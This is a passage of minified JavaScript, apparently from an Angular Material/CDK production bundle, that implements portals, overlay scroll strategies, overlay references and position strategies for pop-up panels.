.mat-flat-button,.cdk-high-contrast-active .mat-raised-button,.cdk-high-contrast-active .mat-icon-button,.cdk-high-contrast-active .mat-fab,.cdk-high-contrast-active .mat-mini-fab{outline:solid 1px}"],encapsulation:2,changeDetection:0}),t})(),up=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,la,la]}),t})(),QW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();function $W(t,a){return a?e=>ug(a.pipe(Cn(1),function P_e(){return Ie((t,a)=>{t.subscribe(Ae(a,y))})}()),e.pipe($W(t))):Ut((e,i)=>t(e,i).pipe(Cn(1),H4(e)))}function Z3(t,a=Vy){const e=M3(t,a);return $W(()=>e)}class Jw{attach(a){return this._attachedHost=a,a.attach(this)}detach(){let a=this._attachedHost;null!=a&&(this._attachedHost=null,a.detach())}get isAttached(){return null!=this._attachedHost}setAttachedHost(a){this._attachedHost=a}}class hp extends Jw{constructor(a,e,i,n){super(),this.component=a,this.viewContainerRef=e,this.injector=i,this.componentFactoryResolver=n}}class Mm extends Jw{constructor(a,e,i,n){super(),this.templateRef=a,this.viewContainerRef=e,this.context=i,this.injector=n}get origin(){return this.templateRef.elementRef}attach(a,e=this.context){return this.context=e,super.attach(a)}detach(){return this.context=void 0,super.detach()}}class O_e extends Jw{constructor(a){super(),this.element=a instanceof mi?a.nativeElement:a}}class eA{constructor(){this._isDisposed=!1,this.attachDomPortal=null}hasAttached(){return!!this._attachedPortal}attach(a){return a instanceof hp?(this._attachedPortal=a,this.attachComponentPortal(a)):a instanceof Mm?(this._attachedPortal=a,this.attachTemplatePortal(a)):this.attachDomPortal&&a instanceof O_e?(this._attachedPortal=a,this.attachDomPortal(a)):void 0}detach(){this._attachedPortal&&(this._attachedPortal.setAttachedHost(null),this._attachedPortal=null),this._invokeDisposeFn()}dispose(){this.hasAttached()&&this.detach(),this._invokeDisposeFn(),this._isDisposed=!0}setDisposeFn(a){this._disposeFn=a}_invokeDisposeFn(){this._disposeFn&&(this._disposeFn(),this._disposeFn=null)}}class Zw extends eA{constructor(a,e,i,n,r){super(),this.outletElement=a,this._componentFactoryResolver=e,this._appRef=i,this._defaultInjector=n,this.attachDomPortal=c=>{const d=c.element,T=this._document.createComment("dom-portal");d.parentNode.insertBefore(T,d),this.outletElement.appendChild(d),this._attachedPortal=c,super.setDisposeFn(()=>{T.parentNode&&T.parentNode.replaceChild(d,T)})},this._document=r}attachComponentPortal(a){const i=(a.componentFactoryResolver||this._componentFactoryResolver).resolveComponentFactory(a.component);let n;return a.viewContainerRef?(n=a.viewContainerRef.createComponent(i,a.viewContainerRef.length,a.injector||a.viewContainerRef.injector),this.setDisposeFn(()=>n.destroy())):(n=i.create(a.injector||this._defaultInjector||Ko.NULL),this._appRef.attachView(n.hostView),this.setDisposeFn(()=>{this._appRef.viewCount>0&&this._appRef.detachView(n.hostView),n.destroy()})),this.outletElement.appendChild(this._getComponentRootNode(n)),this._attachedPortal=a,n}attachTemplatePortal(a){let e=a.viewContainerRef,i=e.createEmbeddedView(a.templateRef,a.context,{injector:a.injector});return i.rootNodes.forEach(n=>this.outletElement.appendChild(n)),i.detectChanges(),this.setDisposeFn(()=>{let n=e.indexOf(i);-1!==n&&e.remove(n)}),this._attachedPortal=a,i}dispose(){super.dispose(),this.outletElement.remove()}_getComponentRootNode(a){return a.hostView.rootNodes[0]}}let N_e=(()=>{class t extends Mm{constructor(e,i){super(e,i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","cdkPortal",""]],exportAs:["cdkPortal"],features:[ci]}),t})(),Cu=(()=>{class t extends eA{constructor(e,i,n){super(),this._componentFactoryResolver=e,this._viewContainerRef=i,this._isInitialized=!1,this.attached=new Tt,this.attachDomPortal=r=>{const c=r.element,d=this._document.createComment("dom-portal");r.setAttachedHost(this),c.parentNode.insertBefore(d,c),this._getRootNode().appendChild(c),this._attachedPortal=r,super.setDisposeFn(()=>{d.parentNode&&d.parentNode.replaceChild(c,d)})},this._document=n}get portal(){return this._attachedPortal}set portal(e){this.hasAttached()&&!e&&!this._isInitialized||(this.hasAttached()&&super.detach(),e&&super.attach(e),this._attachedPortal=e||null)}get attachedRef(){return this._attachedRef}ngOnInit(){this._isInitialized=!0}ngOnDestroy(){super.dispose(),this._attachedPortal=null,this._attachedRef=null}attachComponentPortal(e){e.setAttachedHost(this);const i=null!=e.viewContainerRef?e.viewContainerRef:this._viewContainerRef,r=(e.componentFactoryResolver||this._componentFactoryResolver).resolveComponentFactory(e.component),c=i.createComponent(r,i.length,e.injector||i.injector);return i!==this._viewContainerRef&&this._getRootNode().appendChild(c.hostView.rootNodes[0]),super.setDisposeFn(()=>c.destroy()),this._attachedPortal=e,this._attachedRef=c,this.attached.emit(c),c}attachTemplatePortal(e){e.setAttachedHost(this);const i=this._viewContainerRef.createEmbeddedView(e.templateRef,e.context,{injector:e.injector});return super.setDisposeFn(()=>this._viewContainerRef.clear()),this._attachedPortal=e,this._attachedRef=i,this.attached.emit(i),i}_getRootNode(){const e=this._viewContainerRef.element.nativeElement;return e.nodeType===e.ELEMENT_NODE?e:e.parentNode}}return t.\u0275fac=function(e){return new(e||t)(Ee(On),Ee(fo),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","cdkPortalOutlet",""]],inputs:{portal:["cdkPortalOutlet","portal"]},outputs:{attached:"attached"},exportAs:["cdkPortalOutlet"],features:[ci]}),t})(),yu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const KW=Mz();class L_e{constructor(a,e){this._viewportRuler=a,this._previousHTMLStyles={top:"",left:""},this._isEnabled=!1,this._document=e}attach(){}enable(){if(this._canBeEnabled()){const a=this._document.documentElement;this._previousScrollPosition=this._viewportRuler.getViewportScrollPosition(),this._previousHTMLStyles.left=a.style.left||"",this._previousHTMLStyles.top=a.style.top||"",a.style.left=vs(-this._previousScrollPosition.left),a.style.top=vs(-this._previousScrollPosition.top),a.classList.add("cdk-global-scrollblock"),this._isEnabled=!0}}disable(){if(this._isEnabled){const a=this._document.documentElement,i=a.style,n=this._document.body.style,r=i.scrollBehavior||"",c=n.scrollBehavior||"";this._isEnabled=!1,i.left=this._previousHTMLStyles.left,i.top=this._previousHTMLStyles.top,a.classList.remove("cdk-global-scrollblock"),KW&&(i.scrollBehavior=n.scrollBehavior="auto"),window.scroll(this._previousScrollPosition.left,this._previousScrollPosition.top),KW&&(i.scrollBehavior=r,n.scrollBehavior=c)}}_canBeEnabled(){if(this._document.documentElement.classList.contains("cdk-global-scrollblock")||this._isEnabled)return!1;const e=this._document.body,i=this._viewportRuler.getViewportSize();return e.scrollHeight>i.height||e.scrollWidth>i.width}}class z_e{constructor(a,e,i,n){this._scrollDispatcher=a,this._ngZone=e,this._viewportRuler=i,this._config=n,this._scrollSubscription=null,this._detach=()=>{this.disable(),this._overlayRef.hasAttached()&&this._ngZone.run(()=>this._overlayRef.detach())}}attach(a){this._overlayRef=a}enable(){if(this._scrollSubscription)return;const a=this._scrollDispatcher.scrolled(0);this._config&&this._config.threshold&&this._config.threshold>1?(this._initialScrollPosition=this._viewportRuler.getViewportScrollPosition().top,this._scrollSubscription=a.subscribe(()=>{const e=this._viewportRuler.getViewportScrollPosition().top;Math.abs(e-this._initialScrollPosition)>this._config.threshold?this._detach():this._overlayRef.updatePosition()})):this._scrollSubscription=a.subscribe(this._detach)}disable(){this._scrollSubscription&&(this._scrollSubscription.unsubscribe(),this._scrollSubscription=null)}detach(){this.disable(),this._overlayRef=null}}class XW{enable(){}disable(){}attach(){}}function e8(t,a){return a.some(e=>t.bottom<e.top||t.top>e.bottom||t.right<e.left||t.left>e.right)}function YW(t,a){return a.some(e=>t.top<e.top||t.bottom>e.bottom||t.left<e.left||t.right>e.right)}class W_e{constructor(a,e,i,n){this._scrollDispatcher=a,this._viewportRuler=e,this._ngZone=i,this._config=n,this._scrollSubscription=null}attach(a){this._overlayRef=a}enable(){this._scrollSubscription||(this._scrollSubscription=this._scrollDispatcher.scrolled(this._config?this._config.scrollThrottle:0).subscribe(()=>{if(this._overlayRef.updatePosition(),this._config&&this._config.autoClose){const e=this._overlayRef.overlayElement.getBoundingClientRect(),{width:i,height:n}=this._viewportRuler.getViewportSize();e8(e,[{width:i,height:n,bottom:n,right:i,top:0,left:0}])&&(this.disable(),this._ngZone.run(()=>this._overlayRef.detach()))}}))}disable(){this._scrollSubscription&&(this._scrollSubscription.unsubscribe(),this._scrollSubscription=null)}detach(){this.disable(),this._overlayRef=null}}let F_e=(()=>{class t{constructor(e,i,n,r){this._scrollDispatcher=e,this._viewportRuler=i,this._ngZone=n,this.noop=()=>new XW,this.close=c=>new z_e(this._scrollDispatcher,this._ngZone,this._viewportRuler,c),this.block=()=>new L_e(this._viewportRuler,this._document),this.reposition=c=>new W_e(this._scrollDispatcher,this._viewportRuler,this._ngZone,c),this._document=r}}return t.\u0275fac=function(e){return new(e||t)(At(By),At(bm),At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class yg{constructor(a){if(this.scrollStrategy=new XW,this.panelClass="",this.hasBackdrop=!1,this.backdropClass="cdk-overlay-dark-backdrop",this.disposeOnNavigation=!1,a){const e=Object.keys(a);for(const i of e)void 0!==a[i]&&(this[i]=a[i])}}}class V_e{constructor(a,e){this.connectionPair=a,this.scrollableViewProperties=e}}class nb{constructor(a,e,i,n,r,c,d,T,k,q=!1){this._portalOutlet=a,this._host=e,this._pane=i,this._config=n,this._ngZone=r,this._keyboardDispatcher=c,this._document=d,this._location=T,this._outsideClickDispatcher=k,this._animationsDisabled=q,this._backdropElement=null,this._backdropClick=new J,this._attachments=new J,this._detachments=new J,this._locationChanges=I.EMPTY,this._backdropClickHandler=Y=>this._backdropClick.next(Y),this._backdropTransitionendHandler=Y=>{this._disposeBackdrop(Y.target)},this._keydownEvents=new J,this._outsidePointerEvents=new J,n.scrollStrategy&&(this._scrollStrategy=n.scrollStrategy,this._scrollStrategy.attach(this)),this._positionStrategy=n.positionStrategy}get overlayElement(){return this._pane}get backdropElement(){return this._backdropElement}get hostElement(){return this._host}attach(a){!this._host.parentElement&&this._previousHostParent&&this._previousHostParent.appendChild(this._host);const e=this._portalOutlet.attach(a);return this._positionStrategy&&this._positionStrategy.attach(this),this._updateStackingOrder(),this._updateElementSize(),this._updateElementDirection(),this._scrollStrategy&&this._scrollStrategy.enable(),this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this.hasAttached()&&this.updatePosition()}),this._togglePointerEvents(!0),this._config.hasBackdrop&&this._attachBackdrop(),this._config.panelClass&&this._toggleClasses(this._pane,this._config.panelClass,!0),this._attachments.next(),this._keyboardDispatcher.add(this),this._config.disposeOnNavigation&&(this._locationChanges=this._location.subscribe(()=>this.dispose())),this._outsideClickDispatcher.add(this),"function"==typeof(null==e?void 0:e.onDestroy)&&e.onDestroy(()=>{this.hasAttached()&&this._ngZone.runOutsideAngular(()=>Promise.resolve().then(()=>this.detach()))}),e}detach(){if(!this.hasAttached())return;this.detachBackdrop(),this._togglePointerEvents(!1),this._positionStrategy&&this._positionStrategy.detach&&this._positionStrategy.detach(),this._scrollStrategy&&this._scrollStrategy.disable();const a=this._portalOutlet.detach();return this._detachments.next(),this._keyboardDispatcher.remove(this),this._detachContentWhenStable(),this._locationChanges.unsubscribe(),this._outsideClickDispatcher.remove(this),a}dispose(){var a;const e=this.hasAttached();this._positionStrategy&&this._positionStrategy.dispose(),this._disposeScrollStrategy(),this._disposeBackdrop(this._backdropElement),this._locationChanges.unsubscribe(),this._keyboardDispatcher.remove(this),this._portalOutlet.dispose(),this._attachments.complete(),this._backdropClick.complete(),this._keydownEvents.complete(),this._outsidePointerEvents.complete(),this._outsideClickDispatcher.remove(this),null===(a=this._host)||void 0===a||a.remove(),this._previousHostParent=this._pane=this._host=null,e&&this._detachments.next(),this._detachments.complete()}hasAttached(){return this._portalOutlet.hasAttached()}backdropClick(){return this._backdropClick}attachments(){return this._attachments}detachments(){return this._detachments}keydownEvents(){return this._keydownEvents}outsidePointerEvents(){return this._outsidePointerEvents}getConfig(){return this._config}updatePosition(){this._positionStrategy&&this._positionStrategy.apply()}updatePositionStrategy(a){a!==this._positionStrategy&&(this._positionStrategy&&this._positionStrategy.dispose(),this._positionStrategy=a,this.hasAttached()&&(a.attach(this),this.updatePosition()))}updateSize(a){this._config=Object.assign(Object.assign({},this._config),a),this._updateElementSize()}setDirection(a){this._config=Object.assign(Object.assign({},this._config),{direction:a}),this._updateElementDirection()}addPanelClass(a){this._pane&&this._toggleClasses(this._pane,a,!0)}removePanelClass(a){this._pane&&this._toggleClasses(this._pane,a,!1)}getDirection(){const a=this._config.direction;return a?"string"==typeof a?a:a.value:"ltr"}updateScrollStrategy(a){a!==this._scrollStrategy&&(this._disposeScrollStrategy(),this._scrollStrategy=a,this.hasAttached()&&(a.attach(this),a.enable()))}_updateElementDirection(){this._host.setAttribute("dir",this.getDirection())}_updateElementSize(){if(!this._pane)return;const a=this._pane.style;a.width=vs(this._config.width),a.height=vs(this._config.height),a.minWidth=vs(this._config.minWidth),a.minHeight=vs(this._config.minHeight),a.maxWidth=vs(this._config.maxWidth),a.maxHeight=vs(this._config.maxHeight)}_togglePointerEvents(a){this._pane.style.pointerEvents=a?"":"none"}_attachBackdrop(){const a="cdk-overlay-backdrop-showing";this._backdropElement=this._document.createElement("div"),this._backdropElement.classList.add("cdk-overlay-backdrop"),this._animationsDisabled&&this._backdropElement.classList.add("cdk-overlay-backdrop-noop-animation"),this._config.backdropClass&&this._toggleClasses(this._backdropElement,this._config.backdropClass,!0),this._host.parentElement.insertBefore(this._backdropElement,this._host),this._backdropElement.addEventListener("click",this._backdropClickHandler),this._animationsDisabled||"undefined"==typeof requestAnimationFrame?this._backdropElement.classList.add(a):this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>{this._backdropElement&&this._backdropElement.classList.add(a)})})}_updateStackingOrder(){this._host.nextSibling&&this._host.parentNode.appendChild(this._host)}detachBackdrop(){const a=this._backdropElement;if(a){if(this._animationsDisabled)return void this._disposeBackdrop(a);a.classList.remove("cdk-overlay-backdrop-showing"),this._ngZone.runOutsideAngular(()=>{a.addEventListener("transitionend",this._backdropTransitionendHandler)}),a.style.pointerEvents="none",this._backdropTimeout=this._ngZone.runOutsideAngular(()=>setTimeout(()=>{this._disposeBackdrop(a)},500))}}_toggleClasses(a,e,i){const n=Oy(e||[]).filter(r=>!!r);n.length&&(i?a.classList.add(...n):a.classList.remove(...n))}_detachContentWhenStable(){this._ngZone.runOutsideAngular(()=>{const a=this._ngZone.onStable.pipe(ea(ra(this._attachments,this._detachments))).subscribe(()=>{(!this._pane||!this._host||0===this._pane.children.length)&&(this._pane&&this._config.panelClass&&this._toggleClasses(this._pane,this._config.panelClass,!1),this._host&&this._host.parentElement&&(this._previousHostParent=this._host.parentElement,this._host.remove()),a.unsubscribe())})})}_disposeScrollStrategy(){const a=this._scrollStrategy;a&&(a.disable(),a.detach&&a.detach())}_disposeBackdrop(a){a&&(a.removeEventListener("click",this._backdropClickHandler),a.removeEventListener("transitionend",this._backdropTransitionendHandler),a.remove(),this._backdropElement===a&&(this._backdropElement=null)),this._backdropTimeout&&(clearTimeout(this._backdropTimeout),this._backdropTimeout=void 0)}}let ob=(()=>{class t{constructor(e,i){this._platform=i,this._document=e}ngOnDestroy(){var e;null===(e=this._containerElement)||void 0===e||e.remove()}getContainerElement(){return this._containerElement||this._createContainer(),this._containerElement}_createContainer(){const e="cdk-overlay-container";if(this._platform.isBrowser||rw()){const n=this._document.querySelectorAll(`.${e}[platform="server"], .${e}[platform="test"]`);for(let r=0;r<n.length;r++)n[r].remove()}const i=this._document.createElement("div");i.classList.add(e),rw()?i.setAttribute("platform","test"):this._platform.isBrowser||i.setAttribute("platform","server"),this._document.body.appendChild(i),this._containerElement=i}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const JW="cdk-overlay-connected-position-bounding-box",B_e=/([A-Za-z%]+)$/;class H_e{constructor(a,e,i,n,r){this._viewportRuler=e,this._document=i,this._platform=n,this._overlayContainer=r,this._lastBoundingBoxSize={width:0,height:0},this._isPushed=!1,this._canPush=!0,this._growAfterOpen=!1,this._hasFlexibleDimensions=!0,this._positionLocked=!1,this._viewportMargin=0,this._scrollables=[],this._preferredPositions=[],this._positionChanges=new J,this._resizeSubscription=I.EMPTY,this._offsetX=0,this._offsetY=0,this._appliedPanelClasses=[],this.positionChanges=this._positionChanges,this.setOrigin(a)}get positions(){return this._preferredPositions}attach(a){this._validatePositions(),a.hostElement.classList.add(JW),this._overlayRef=a,this._boundingBox=a.hostElement,this._pane=a.overlayElement,this._isDisposed=!1,this._isInitialRender=!0,this._lastPosition=null,this._resizeSubscription.unsubscribe(),this._resizeSubscription=this._viewportRuler.change().subscribe(()=>{this._isInitialRender=!0,this.apply()})}apply(){if(this._isDisposed||!this._platform.isBrowser)return;if(!this._isInitialRender&&this._positionLocked&&this._lastPosition)return void this.reapplyLastPosition();this._clearPanelClasses(),this._resetOverlayElementStyles(),this._resetBoundingBoxStyles(),this._viewportRect=this._getNarrowedViewportRect(),this._originRect=this._getOriginRect(),this._overlayRect=this._pane.getBoundingClientRect(),this._containerRect=this._overlayContainer.getContainerElement().getBoundingClientRect();const a=this._originRect,e=this._overlayRect,i=this._viewportRect,n=this._containerRect,r=[];let c;for(let d of this._preferredPositions){let T=this._getOriginPoint(a,n,d),k=this._getOverlayPoint(T,e,d),q=this._getOverlayFit(k,e,i,d);if(q.isCompletelyWithinViewport)return this._isPushed=!1,void this._applyPosition(d,T);this._canFitWithFlexibleDimensions(q,k,i)?r.push({position:d,origin:T,overlayRect:e,boundingBoxRect:this._calculateBoundingBoxRect(T,d)}):(!c||c.overlayFit.visibleArea<q.visibleArea)&&(c={overlayFit:q,overlayPoint:k,originPoint:T,position:d,overlayRect:e})}if(r.length){let d=null,T=-1;for(const k of r){const q=k.boundingBoxRect.width*k.boundingBoxRect.height*(k.position.weight||1);q>T&&(T=q,d=k)}return this._isPushed=!1,void this._applyPosition(d.position,d.origin)}if(this._canPush)return this._isPushed=!0,void this._applyPosition(c.position,c.originPoint);this._applyPosition(c.position,c.originPoint)}detach(){this._clearPanelClasses(),this._lastPosition=null,this._previousPushAmount=null,this._resizeSubscription.unsubscribe()}dispose(){this._isDisposed||(this._boundingBox&&bg(this._boundingBox.style,{top:"",left:"",right:"",bottom:"",height:"",width:"",alignItems:"",justifyContent:""}),this._pane&&this._resetOverlayElementStyles(),this._overlayRef&&this._overlayRef.hostElement.classList.remove(JW),this.detach(),this._positionChanges.complete(),this._overlayRef=this._boundingBox=null,this._isDisposed=!0)}reapplyLastPosition(){if(this._isDisposed||!this._platform.isBrowser)return;const a=this._lastPosition;if(a){this._originRect=this._getOriginRect(),this._overlayRect=this._pane.getBoundingClientRect(),this._viewportRect=this._getNarrowedViewportRect(),this._containerRect=this._overlayContainer.getContainerElement().getBoundingClientRect();const e=this._getOriginPoint(this._originRect,this._containerRect,a);this._applyPosition(a,e)}else this.apply()}withScrollableContainers(a){return this._scrollables=a,this}withPositions(a){return this._preferredPositions=a,-1===a.indexOf(this._lastPosition)&&(this._lastPosition=null),this._validatePositions(),this}withViewportMargin(a){return this._viewportMargin=a,this}withFlexibleDimensions(a=!0){return this._hasFlexibleDimensions=a,this}withGrowAfterOpen(a=!0){return this._growAfterOpen=a,this}withPush(a=!0){return this._canPush=a,this}withLockedPosition(a=!0){return this._positionLocked=a,this}setOrigin(a){return this._origin=a,this}withDefaultOffsetX(a){return this._offsetX=a,this}withDefaultOffsetY(a){return this._offsetY=a,this}withTransformOriginOn(a){return this._transformOriginSelector=a,this}_getOriginPoint(a,e,i){let n,r;if("center"==i.originX)n=a.left+a.width/2;else{const c=this._isRtl()?a.right:a.left,d=this._isRtl()?a.left:a.right;n="start"==i.originX?c:d}return e.left<0&&(n-=e.left),r="center"==i.originY?a.top+a.height/2:"top"==i.originY?a.top:a.bottom,e.top<0&&(r-=e.top),{x:n,y:r}}_getOverlayPoint(a,e,i){let n,r;return n="center"==i.overlayX?-e.width/2:"start"===i.overlayX?this._isRtl()?-e.width:0:this._isRtl()?0:-e.width,r="center"==i.overlayY?-e.height/2:"top"==i.overlayY?0:-e.height,{x:a.x+n,y:a.y+r}}_getOverlayFit(a,e,i,n){const r=eF(e);let{x:c,y:d}=a,T=this._getOffset(n,"x"),k=this._getOffset(n,"y");T&&(c+=T),k&&(d+=k);let te=0-d,pe=d+r.height-i.height,Re=this._subtractOverflows(r.width,0-c,c+r.width-i.width),Fe=this._subtractOverflows(r.height,te,pe),Ne=Re*Fe;return{visibleArea:Ne,isCompletelyWithinViewport:r.width*r.height===Ne,fitsInViewportVertically:Fe===r.height,fitsInViewportHorizontally:Re==r.width}}_canFitWithFlexibleDimensions(a,e,i){if(this._hasFlexibleDimensions){const n=i.bottom-e.y,r=i.right-e.x,c=ZW(this._overlayRef.getConfig().minHeight),d=ZW(this._overlayRef.getConfig().minWidth),k=a.fitsInViewportHorizontally||null!=d&&d<=r;return(a.fitsInViewportVertically||null!=c&&c<=n)&&k}return!1}_pushOverlayOnScreen(a,e,i){if(this._previousPushAmount&&this._positionLocked)return{x:a.x+this._previousPushAmount.x,y:a.y+this._previousPushAmount.y};const n=eF(e),r=this._viewportRect,c=Math.max(a.x+n.width-r.width,0),d=Math.max(a.y+n.height-r.height,0),T=Math.max(r.top-i.top-a.y,0),k=Math.max(r.left-i.left-a.x,0);let q=0,Y=0;return q=n.width<=r.width?k||-c:a.x<this._viewportMargin?r.left-i.left-a.x:0,Y=n.height<=r.height?T||-d:a.y<this._viewportMargin?r.top-i.top-a.y:0,this._previousPushAmount={x:q,y:Y},{x:a.x+q,y:a.y+Y}}_applyPosition(a,e){if(this._setTransformOrigin(a),this._setOverlayElementStyles(e,a),this._setBoundingBoxStyles(e,a),a.panelClass&&this._addPanelClasses(a.panelClass),this._lastPosition=a,this._positionChanges.observers.length){const i=this._getScrollVisibility(),n=new V_e(a,i);this._positionChanges.next(n)}this._isInitialRender=!1}_setTransformOrigin(a){if(!this._transformOriginSelector)return;const e=this._boundingBox.querySelectorAll(this._transformOriginSelector);let i,n=a.overlayY;i="center"===a.overlayX?"center":this._isRtl()?"start"===a.overlayX?"right":"left":"start"===a.overlayX?"left":"right";for(let r=0;r<e.length;r++)e[r].style.transformOrigin=`${i} ${n}`}_calculateBoundingBoxRect(a,e){const i=this._viewportRect,n=this._isRtl();let r,c,d,q,Y,te;if("top"===e.overlayY)c=a.y,r=i.height-c+this._viewportMargin;else if("bottom"===e.overlayY)d=i.height-a.y+2*this._viewportMargin,r=i.height-d+this._viewportMargin;else{const pe=Math.min(i.bottom-a.y+i.top,a.y),Re=this._lastBoundingBoxSize.height;r=2*pe,c=a.y-pe,r>Re&&!this._isInitialRender&&!this._growAfterOpen&&(c=a.y-Re/2)}if("end"===e.overlayX&&!n||"start"===e.overlayX&&n)te=i.width-a.x+this._viewportMargin,q=a.x-this._viewportMargin;else if("start"===e.overlayX&&!n||"end"===e.overlayX&&n)Y=a.x,q=i.right-a.x;else{const pe=Math.min(i.right-a.x+i.left,a.x),Re=this._lastBoundingBoxSize.width;q=2*pe,Y=a.x-pe,q>Re&&!this._isInitialRender&&!this._growAfterOpen&&(Y=a.x-Re/2)}return{top:c,left:Y,bottom:d,right:te,width:q,height:r}}_setBoundingBoxStyles(a,e){const i=this._calculateBoundingBoxRect(a,e);!this._isInitialRender&&!this._growAfterOpen&&(i.height=Math.min(i.height,this._lastBoundingBoxSize.height),i.width=Math.min(i.width,this._lastBoundingBoxSize.width));const n={};if(this._hasExactPosition())n.top=n.left="0",n.bottom=n.right=n.maxHeight=n.maxWidth="",n.width=n.height="100%";else{const r=this._overlayRef.getConfig().maxHeight,c=this._overlayRef.getConfig().maxWidth;n.height=vs(i.height),n.top=vs(i.top),n.bottom=vs(i.bottom),n.width=vs(i.width),n.left=vs(i.left),n.right=vs(i.right),n.alignItems="center"===e.overlayX?"center":"end"===e.overlayX?"flex-end":"flex-start",n.justifyContent="center"===e.overlayY?"center":"bottom"===e.overlayY?"flex-end":"flex-start",r&&(n.maxHeight=vs(r)),c&&(n.maxWidth=vs(c))}this._lastBoundingBoxSize=i,bg(this._boundingBox.style,n)}_resetBoundingBoxStyles(){bg(this._boundingBox.style,{top:"0",left:"0",right:"0",bottom:"0",height:"",width:"",alignItems:"",justifyContent:""})}_resetOverlayElementStyles(){bg(this._pane.style,{top:"",left:"",bottom:"",right:"",position:"",transform:""})}_setOverlayElementStyles(a,e){const i={},n=this._hasExactPosition(),r=this._hasFlexibleDimensions,c=this._overlayRef.getConfig();if(n){const q=this._viewportRuler.getViewportScrollPosition();bg(i,this._getExactOverlayY(e,a,q)),bg(i,this._getExactOverlayX(e,a,q))}else i.position="static";let d="",T=this._getOffset(e,"x"),k=this._getOffset(e,"y");T&&(d+=`translateX(${T}px) `),k&&(d+=`translateY(${k}px)`),i.transform=d.trim(),c.maxHeight&&(n?i.maxHeight=vs(c.maxHeight):r&&(i.maxHeight="")),c.maxWidth&&(n?i.maxWidth=vs(c.maxWidth):r&&(i.maxWidth="")),bg(this._pane.style,i)}_getExactOverlayY(a,e,i){let n={top:"",bottom:""},r=this._getOverlayPoint(e,this._overlayRect,a);return this._isPushed&&(r=this._pushOverlayOnScreen(r,this._overlayRect,i)),"bottom"===a.overlayY?n.bottom=this._document.documentElement.clientHeight-(r.y+this._overlayRect.height)+"px":n.top=vs(r.y),n}_getExactOverlayX(a,e,i){let c,n={left:"",right:""},r=this._getOverlayPoint(e,this._overlayRect,a);return this._isPushed&&(r=this._pushOverlayOnScreen(r,this._overlayRect,i)),c=this._isRtl()?"end"===a.overlayX?"left":"right":"end"===a.overlayX?"right":"left","right"===c?n.right=this._document.documentElement.clientWidth-(r.x+this._overlayRect.width)+"px":n.left=vs(r.x),n}_getScrollVisibility(){const a=this._getOriginRect(),e=this._pane.getBoundingClientRect(),i=this._scrollables.map(n=>n.getElementRef().nativeElement.getBoundingClientRect());return{isOriginClipped:YW(a,i),isOriginOutsideView:e8(a,i),isOverlayClipped:YW(e,i),isOverlayOutsideView:e8(e,i)}}_subtractOverflows(a,...e){return e.reduce((i,n)=>i-Math.max(n,0),a)}_getNarrowedViewportRect(){const a=this._document.documentElement.clientWidth,e=this._document.documentElement.clientHeight,i=this._viewportRuler.getViewportScrollPosition();return{top:i.top+this._viewportMargin,left:i.left+this._viewportMargin,right:i.left+a-this._viewportMargin,bottom:i.top+e-this._viewportMargin,width:a-2*this._viewportMargin,height:e-2*this._viewportMargin}}_isRtl(){return"rtl"===this._overlayRef.getDirection()}_hasExactPosition(){return!this._hasFlexibleDimensions||this._isPushed}_getOffset(a,e){return"x"===e?null==a.offsetX?this._offsetX:a.offsetX:null==a.offsetY?this._offsetY:a.offsetY}_validatePositions(){}_addPanelClasses(a){this._pane&&Oy(a).forEach(e=>{""!==e&&-1===this._appliedPanelClasses.indexOf(e)&&(this._appliedPanelClasses.push(e),this._pane.classList.add(e))})}_clearPanelClasses(){this._pane&&(this._appliedPanelClasses.forEach(a=>{this._pane.classList.remove(a)}),this._appliedPanelClasses=[])}_getOriginRect(){const a=this._origin;if(a instanceof mi)return a.nativeElement.getBoundingClientRect();if(a instanceof Element)return a.getBoundingClientRect();const e=a.width||0,i=a.height||0;return{top:a.y,bottom:a.y+i,left:a.x,right:a.x+e,height:i,width:e}}}function bg(t,a){for(let e in a)a.hasOwnProperty(e)&&(t[e]=a[e]);return t}function ZW(t){if("number"!=typeof t&&null!=t){const[a,e]=t.split(B_e);return e&&"px"!==e?null:parseFloat(a)}return t||null}function eF(t){return{top:Math.floor(t.top),right:Math.floor(t.right),bottom:Math.floor(t.bottom),left:Math.floor(t.left),width:Math.floor(t.width),height:Math.floor(t.height)}}const tF="cdk-global-overlay-wrapper";class U_e{constructor(){this._cssPosition="static",this._topOffset="",this._bottomOffset="",this._alignItems="",this._xPosition="",this._xOffset="",this._width="",this._height="",this._isDisposed=!1}attach(a){const e=a.getConfig();this._overlayRef=a,this._width&&!e.width&&a.updateSize({width:this._width}),this._height&&!e.height&&a.updateSize({height:this._height}),a.hostElement.classList.add(tF),this._isDisposed=!1}top(a=""){return this._bottomOffset="",this._topOffset=a,this._alignItems="flex-start",this}left(a=""){return this._xOffset=a,this._xPosition="left",this}bottom(a=""){return this._topOffset="",this._bottomOffset=a,this._alignItems="flex-end",this}right(a=""){return this._xOffset=a,this._xPosition="right",this}start(a=""){return this._xOffset=a,this._xPosition="start",this}end(a=""){return this._xOffset=a,this._xPosition="end",this}width(a=""){return this._overlayRef?this._overlayRef.updateSize({width:a}):this._width=a,this}height(a=""){return this._overlayRef?this._overlayRef.updateSize({height:a}):this._height=a,this}centerHorizontally(a=""){return this.left(a),this._xPosition="center",this}centerVertically(a=""){return this.top(a),this._alignItems="center",this}apply(){if(!this._overlayRef||!this._overlayRef.hasAttached())return;const a=this._overlayRef.overlayElement.style,e=this._overlayRef.hostElement.style,i=this._overlayRef.getConfig(),{width:n,height:r,maxWidth:c,maxHeight:d}=i,T=!("100%"!==n&&"100vw"!==n||c&&"100%"!==c&&"100vw"!==c),k=!("100%"!==r&&"100vh"!==r||d&&"100%"!==d&&"100vh"!==d),q=this._xPosition,Y=this._xOffset,te="rtl"===this._overlayRef.getConfig().direction;let 